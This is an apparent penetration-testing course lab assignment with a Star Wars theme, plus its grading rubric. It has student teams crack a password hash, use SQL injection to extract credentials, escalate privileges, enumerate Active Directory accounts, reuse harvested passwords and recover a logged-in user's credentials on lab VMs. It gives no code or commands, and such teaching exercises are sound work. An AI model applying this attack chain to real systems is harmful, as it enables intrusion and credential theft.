In this lab you will work in teams of 2-3 people (you may opt to work alone if you want to). You will practice the use of various hacking tools and techniques in a multi-stage scenario involving systems of various ages and operating systems. Each level leads to the next one. You may decide to divide up tasks as you like or compete to see who solves each part first, but your mark is collective, everyone shares the same mark. You will submit as a group and so there should be only one submitted document with all your names on it.
Note: For this lab to work at home, you should set up your home config to match the labs. Please refer to the video on that topic and contact me if you are having issues with it.
Part 1:
In a galaxy far, far away, the Empire is trying to build Death Star 2.0.
Rebel forces are looking for information on a long-lost device that used to
belong to Han Solo in the previous war. This takes you to a remote part of the
Galaxy to a system called vmnet1. Here you must gain access to Han Solo’s system
and hopefully find the information you need to hack into the Death Star system and
bring an end to the threat that the Empire represents to the free republic worlds…
Your first task in this mission is to gain access to R2D2’s data. The memory of the droid R2D2 has been recovered, but some of it is encrypted. A SHA256 hash of the password to the encrypted data was also recovered, but it’s not reversible. Using the Droid Dictionary provided, you must crack the hash and use the password to extract the information that will allow you to boot up and access Han Solo’s device on vmnet1.
Han’s device is encrypted with a boot password and has a separate login password. If you recover the boot password from R2D2’s memory, you will still have to hack into Han’s running system using whatever techniques you have available to you. Once you have access to the system, you will find a document that contains information about an IP address and URL needed for the next stage of your mission. Beware of booby traps!
Deliverable01: Replace the red text with R2D2’s encryption password and describe how you cracked it. Identify which team member(s) you are, describe how you acquired the password and what tools you used.
Deliverable02: Replace the text highlighted in red with the boot password to HanS-PC. Identify which team member(s) you are, describe how you acquired the password and what tools you used.
Deliverable03: Replace the text highlighted in red with the URL contained in the document on Han’s system. Identify which team member(s) you are, describe how you acquired the URL and what tools you used to gain access to the system as well as any difficulties you encountered.
Part 2:
Having obtained the coordinates (IP address) of the next target of your mission,
you must now hack your way into the computer system on Cloud City. The goal
is not to gain physical access to the system but to extract username and password
data from the online database. This will involve an SQL injection attempt. Cloud City
stores login information for both rebels and empire customers. The hope is that some of
these credentials can be used to access empire systems and then escalate privileges…
Your task in this part is to use the IP address and URL that you obtained in part 1 to access the Cloud City server and extract the user credentials that are stored there by using SQL injection. If you can gain the same information in a different way, that will be considered equivalent if it involves hacking techniques. This could involve gaining root access to the server and viewing the stored database information in that way. One of these username/password combinations will give you access to the next system, the Star Destroyer. Your one restriction is that you can’t modify or add virtual hardware.
Deliverable04: Replace the text highlighted in red with the username and password that gives you access to the Star Destroyer system. Identify which team member(s) you are, describe how you acquired the usernames/passwords and what techniques you used, as well as any difficulties you encountered.
Part 3:
Your team now has access to the Star Destroyer, but your access is limited. You need
to establish communications with the Empire so that you can leverage your newfound
access. To do this, you need to escalate privileges on the Star Destroyer and gain enough
rights to establish network communication with the Empire. You need to find out which accounts
that you extracted from Cloud City are usable on Empire systems. You also need to figure
out which accounts you can make use of to take you to the next stage of your mission…
Your task in this part is to log onto the Star Destroyer with an account that you harvested from the last part and gain enough privileges to enable the NIC. Once that is done, you need to get a list of all the accounts that have valid domain accounts by querying EMPIRE.GOV Active Directory. You can use any tools you like to accomplish this (adfind.exe and PowerShell should both work in this respect but there are other ways as well) but you can’t modify or add any virtual hardware.
Cross reference your list of domain users with the data dump from Cloud City and confirm the domain accounts whose passwords you already have.
Deliverable05: Replace the text highlighted in red with a list of all the domain users in EMPIRE.GOV whose passwords you already have. Identify which team member(s) you are, describe how you elevated privileges as well as what tools you used to query AD.
Part 4:
The new republic has discovered that the remnants of Death Star 1.0 are still
in use by the Empire. Although no longer a threat, they have used the older
Death Star as a template to build the new and improved one. Your mission is
to try to gain access to the old Death Star in the hope that you can use that
access to gain some leverage over the much more secure Death Star 2.0 and
hopefully turn this new weapon on the empire itself, thereby winning the war…
Your task in this part is to take the accounts that you gathered in part 3 and attempt to use them to log into the old Death Star. Once you have succeeded in logging into Death Star 1.0, you will find the emperor already logged into the system. You must use your access and hacking tools to determine the emperor’s login information and apply it to gain access to Death Star 2.0. Note that both servers should be on at the same time and should not be rebooted. They can be suspended.
Deliverable06: Replace the text highlighted in red with the username and password of the account that gets you access to Deathstar1.0.
Deliverable07 Replace the text highlighted in red with the emperor’s credentials that get you access to Deathstar2.0. Identify which team member(s) you are, describe how you acquired the password and what tools you used to do so. Provide a screenshot of that account logged onto the Deathstar2.0 and identify any difficulties that you encountered.
Finally, provide some feedback on how you liked the lab and what recommendations you would make for improvement. Below you’ll find the rubric so that you can see how you are evaluated.
LAB3 RUBRIC
Section Marks
Deliverable01: /15
Full marks only if your password comes with a description
of how you got it. Half marks otherwise.
Deliverable02: /5
Full marks only if your password comes with a description
of how you got it. Half marks otherwise.
Deliverable03: /15
Full marks only if the URL comes with a detailed description
of how you got it. Half marks otherwise.
Deliverable04: /15
Full marks only if your password comes with a detailed description
of how you got the username/password list. Half marks otherwise.
Deliverable05: /15
Full marks only if your users/passwords come with a description
of how you escalated privileges and queried AD. Half marks otherwise.
Deliverable06: /5
Full marks only if your password comes with a description
of how you accessed Deathstar1.0. Half marks otherwise.
Deliverable07: /20
Full marks only if your password comes with a detailed description
of how you acquired the emperor’s password. Half marks otherwise.
Lab Discussion: /10
Full marks if all participants provide feedback.
Total: /100
See below for hints for each part. If you are stuck for ideas, you can consult these resources but if you enjoy the challenge, don’t read any further:
Part 1 hints:
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
http://gnuwin32.sourceforge.net/packages/file.htm
Part 2 hints:
Part 3 hints:
http://www.joeware.net/freetools/tools/adfind/
Part 4 hints:
